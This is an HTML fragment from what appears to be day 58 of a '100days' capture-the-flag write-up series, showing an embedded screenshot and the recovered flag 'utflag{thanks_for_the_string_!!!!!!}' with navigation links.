	<p class="c1"><span
			style="overflow: hidden; display: inline-block; margin: 0.00px 0.00px; border: 0.00px solid #000000; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px); width: 725.00px; height: 345.00px;"><img
				alt="" src="images/image1day58.png"
				style="width: 1440.76px; height: 810.00px; margin-left: -715.76px; margin-top: -465.00px; transform: rotate(0.00rad) translateZ(0px); -webkit-transform: rotate(0.00rad) translateZ(0px);"
				title=""></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<p class="c1"><span class="c4">Flag : utflag{thanks_for_the_string_!!!!!!}</span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c4"></span></p>
	<p class="c1 c2"><span class="c3"></span></p>
	<h3 class="c13" id="h.dardaoz37s2v"><span class="c9 c5"></span></h3>
	<hr>
	<p class="c8"><span class="c3">
		<a href='/100days/day57.html'>Previous</a>
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
			<a href='/100days/'>Home</a>
			&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
			<a href='/100days/day59.html'>Next</a>
	</span>
	</p>
</body>

</html>